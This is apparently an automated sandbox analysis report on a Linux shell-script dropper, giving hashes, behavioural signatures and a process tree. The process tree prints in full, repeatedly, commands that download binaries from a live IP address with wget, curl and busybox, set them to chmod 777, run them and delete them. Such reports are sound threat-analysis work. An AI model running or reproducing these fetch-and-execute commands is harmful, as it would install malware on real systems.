Analysis
-
max time kernel
25s -
max time network
26s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/10/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh
-
Size
10KB
-
MD5
d8ec12ed2845ad2e0438b2877c6b582d
-
SHA1
a3ac76cc85f6efe3ee7d9dc250c3167a1316c3b3
-
SHA256
0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24
-
SHA512
459b2e4080a48df3a9e1bcb0b60ca4c80cc2c0b477289a9db6ac26410638c43ecc9c345277a59f191be55b9b37bf113d558d4d1bc8316777707737d80b280d96
-
SSDEEP
192:P/TslVfHcsv+SU0iyP8okBODl/V1aBVpqcsv+So/TslVNiyP8okrzV1aBV2:P/TslVfHcsv+SU0iyP8oYODlmqcsv+Sg
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 22 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 690 chmod 751 chmod 855 chmod 873 chmod 885 chmod 681 chmod 712 chmod 791 chmod 811 chmod 829 chmod 849 chmod 867 chmod 770 chmod 817 chmod 843 chmod 738 chmod 799 chmod 805 chmod 823 chmod 836 chmod 861 chmod 879 chmod -
Executes dropped EXE 22 IoCs
ioc pid Process /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 682 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd 691 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX 713 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 740 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme 752 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc 772 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB 793 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N 800 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS 806 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G 812 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ 818 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 824 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly 830 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 837 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 844 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 850 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd 856 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX 862 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme 868 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS 874 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G 880 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc 886 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc -
Checks CPU configuration 1 TTPs 22 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 22 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly curl File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 curl File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX curl File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc curl File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd curl File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 curl File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX curl File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc curl File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G curl File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ curl File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 curl File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 curl File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme curl File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS curl File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd curl File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme curl File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N curl File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS curl File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 curl File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G curl File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 curl File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB curl
Processes
-
/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh1⤵PID:649
-
/bin/rm/bin/rm bins.sh2⤵PID:651
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:677
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:682
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:684
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:685
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:687
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:691
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:692
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:694
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:700
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:706
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:713
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:714
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:730
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:750
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:765
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:786
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:794
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:796
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:798
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:800
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:804
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:810
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:816
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:822
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:828
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:834
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:837
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:842
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:848
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:854
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:860
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:866
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:872
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:878
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:879
-
-
